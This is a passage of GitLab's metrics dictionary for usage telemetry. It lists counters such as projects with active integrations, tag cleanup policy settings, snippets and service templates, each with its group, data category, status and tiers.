`counts.projects_packagist_active` + +Count of projects with active integrations for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180027_projects_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_pipelines_email_active` + +Count of projects with active integrations for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180038_projects_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_pivotaltracker_active` + +Count of projects with active integrations for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180049_projects_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_prometheus_active` + +Count of projects with active integrations for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180931_projects_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_pushover_active` + +Count of projects with active integrations for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180100_projects_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_redmine_active` + +Count of projects with active integrations for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180111_projects_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_reporting_ci_cd_back_to_github` + +Projects with a GitHub service pipeline enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182212_projects_reporting_ci_cd_back_to_github.yml) + +Group: `group::continuous_integration` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_slack_active` + +Count of projects with active integrations for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180122_projects_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_slack_slash_commands_active` + +Count of projects with active integrations for Slack (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180133_projects_slack_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_teamcity_active` + +Count of projects with active integrations for Teamcity CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180144_projects_teamcity_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_unify_circuit_active` + +Count of projects with active integrations for Unifiy Circuit + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180155_projects_unify_circuit_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_webex_teams_active` + +Count of projects with active integrations for Webex Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180206_projects_webex_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_alerts_created` + +Count of projects with alerts created in given time period + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180458_projects_with_alerts_created.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_alerts_service_enabled` + +Count of projects that have enabled the Alerts service + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180456_projects_with_alerts_service_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_enabled_alert_integrations` + +Count of projects with at least 1 enabled integration + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180500_projects_with_enabled_alert_integrations.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_error_tracking_enabled` + +Count of projects that have enabled Error tracking via Sentry + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180454_projects_with_error_tracking_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_disabled` + +The number of projects with cleanup policy for tags turned off + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181014_projects_with_expiration_policy_disabled.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled` + +A count of projects with the cleanup policy for tags turned on + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181016_projects_with_expiration_policy_enabled.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_cadence_set_to_14d` + +A count of projects with the cleanup policy set to run every 14 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181033_projects_with_expiration_policy_enabled_with_cadence_set_to_14d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_cadence_set_to_1d` + +A count of projects with the cleanup policy set to run every day + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181029_projects_with_expiration_policy_enabled_with_cadence_set_to_1d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_cadence_set_to_1month` + +A count of projects with the cleanup policy set to run monthly + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181035_projects_with_expiration_policy_enabled_with_cadence_set_to_1month.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_cadence_set_to_3month` + +A count of projects with the cleanup policy set to run every 3 months + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181037_projects_with_expiration_policy_enabled_with_cadence_set_to_3month.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_cadence_set_to_7d` + +A count of projects with the cleanup policy set to run every 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181031_projects_with_expiration_policy_enabled_with_cadence_set_to_7d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_1` + +A count of projects with the cleanup policy set to keep 1 tag + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181018_projects_with_expiration_policy_enabled_with_keep_n_set_to_1.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_10` + +A count of projects with the cleanup policy set to keep 10 tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181022_projects_with_expiration_policy_enabled_with_keep_n_set_to_10.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_100` + +A count of projects with the cleanup policy set to keep 100 tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181027_projects_with_expiration_policy_enabled_with_keep_n_set_to_100.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_25` + +A count of projects with the cleanup policy set to keep 25 tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181024_projects_with_expiration_policy_enabled_with_keep_n_set_to_25.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_5` + +A count of projects with the cleanup policy set to keep 5 tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181020_projects_with_expiration_policy_enabled_with_keep_n_set_to_5.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_set_to_50` + +A count of projects with the cleanup policy set to keep 50 tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181025_projects_with_expiration_policy_enabled_with_keep_n_set_to_50.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_keep_n_unset` + +A count of projects with the cleanup policy with the number of tags to keep unset + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181046_projects_with_expiration_policy_enabled_with_keep_n_unset.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_older_than_set_to_14d` + +A count of projects with the cleanup policy set delete tags older than 14 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181040_projects_with_expiration_policy_enabled_with_older_than_set_to_14d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_older_than_set_to_30d` + +A count of projects with the cleanup policy set delete tags older than 30 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181042_projects_with_expiration_policy_enabled_with_older_than_set_to_30d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_older_than_set_to_7d` + +A count of projects with the cleanup policy set delete tags older than 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181038_projects_with_expiration_policy_enabled_with_older_than_set_to_7d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_older_than_set_to_90d` + +A count of projects with the cleanup policy set delete tags older than 90 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181044_projects_with_expiration_policy_enabled_with_older_than_set_to_90d.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_expiration_policy_enabled_with_older_than_unset` + +A count of projects with the cleanup policy with the number of tags to delete unset + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181048_projects_with_expiration_policy_enabled_with_older_than_unset.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_packages` + +Projects with package registry enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181011_projects_with_packages.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_prometheus_alerts` + +Projects with Prometheus alerting enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175019_projects_with_prometheus_alerts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free` + +### `counts.projects_with_repositories_enabled` + +Count of users creating projects that have a matching Git repository, result of a Git push action. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181959_projects_with_repositories_enabled.yml) + +Group: `group::source code` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.projects_with_terraform_reports` + +Count of projects with Terraform MR reports + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175320_projects_with_terraform_reports.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_terraform_states` + +Count of projects with GitLab Managed Terraform State + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175322_projects_with_terraform_states.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_with_tracing_enabled` + +Projects with tracing enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180929_projects_with_tracing_enabled.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.projects_youtrack_active` + +Count of projects with active integrations for YouTrack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180217_projects_youtrack_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.protected_branches` + +Count of total protected branches + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182001_protected_branches.yml) + +Group: `group::source code` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.protected_branches_except_default` + +Count of branches that have been protected and are not the default branch + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182454_protected_branches_except_default.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.releases` + +Unique release tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181918_releases.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.remote_mirrors` + +Count of total remote mirrors. Includes both push and pull mirrors + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182002_remote_mirrors.yml) + +Group: `group::source code` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.requirement_test_reports_ci` + +Count of requirement test reports created from CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175032_requirement_test_reports_ci.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.requirement_test_reports_manual` + +Count of requirement test reports created manually + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175030_requirement_test_reports_manual.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.requirements_created` + +Count of requirements created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175028_requirements_created.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.requirements_with_test_report` + +Count of requirements having a test report + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175034_requirements_with_test_report.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.sast_jobs` + +Count of SAST CI jobs for the month. Job names ending in '-sast' + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182112_sast_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.secret_detection_jobs` + +Count of all 'secret-detection' CI jobs. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182114_secret_detection_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.service_desk_enabled_projects` + +Count of service desk enabled projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175024_service_desk_enabled_projects.yml) + +Group: `group::certify` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.service_desk_issues` + +Count of service desk issues + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175026_service_desk_issues.yml) + +Group: `group::certify` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `counts.snippet_comment` + +Count of comments on Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180253_snippet_comment.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.snippet_create` + +Count of newly created Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180255_snippet_create.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.snippet_update` + +Count of updates to existing Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180257_snippet_update.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.snippets` + +Count of all Snippets + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180306_snippets.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.source_code_pushes` + +Count of total Git push operations + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182006_source_code_pushes.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.static_site_editor_commits` + +Count of commits created from the Static Site Editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180301_static_site_editor_commits.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.static_site_editor_merge_requests` + +Count of merge requests created via Static Site Editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180303_static_site_editor_merge_requests.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.static_site_editor_views` + +Count of Static Site Editor views + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180259_static_site_editor_views.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.status_page_incident_publishes` + +Cumulative count of usages of publish operation + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180502_status_page_incident_publishes.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.status_page_incident_unpublishes` + +Cumulative count of usages of unpublish operation + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180504_status_page_incident_unpublishes.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.status_page_issues` + +Issues published to a Status Page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180507_status_page_issues.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.status_page_projects` + +Projects with status page enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180506_status_page_projects.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.successful_deployments` + +Total successful deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181911_successful_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.suggestions` + +Count of all comments that contain suggested changes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175037_suggestions.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.template_repositories` + +Count of total repo templates used to aggregate all file templates + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182008_template_repositories.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.templates_asana_active` + +Count of active service templates for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175627_templates_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_assembla_active` + +Count of active service templates for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175638_templates_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_bamboo_active` + +Count of active service templates for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175649_templates_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_bugzilla_active` + +Count of active service templates for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175701_templates_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_buildkite_active` + +Count of active service templates for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175712_templates_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_campfire_active` + +Count of active service templates for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175723_templates_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_confluence_active` + +Count of active service templates for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175734_templates_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_custom_issue_tracker_active` + +Count of active service templates for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175745_templates_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_datadog_active` + +Count of active service templates for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182551_templates_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_discord_active` + +Count of active service templates for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175756_templates_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_drone_ci_active` + +Count of active service templates for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175807_templates_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_emails_on_push_active` + +Count of active service templates for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175818_templates_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_ewm_active` + +Count of active service templates for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182618_templates_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_external_wiki_active` + +Count of active service templates for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175829_templates_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_flowdock_active` + +Count of active service templates for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175840_templates_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_github_active` + +Count of active service templates for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175851_templates_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.templates_hangouts_chat_active` + +Count of active service templates for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175902_templates_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_hipchat_active` + +Count of active service templates for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175913_templates_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_irker_active` + +Count of active service templates for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175924_templates_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_jenkins_active` + +Count of active service templates for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175935_templates_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_jira_active` + +Count of active service templates for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175946_templates_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_mattermost_active` + +Count of active service templates for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175957_templates_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.templates_mattermost_slash_commands_active` + +Count of active service templates for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180008_templates_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + 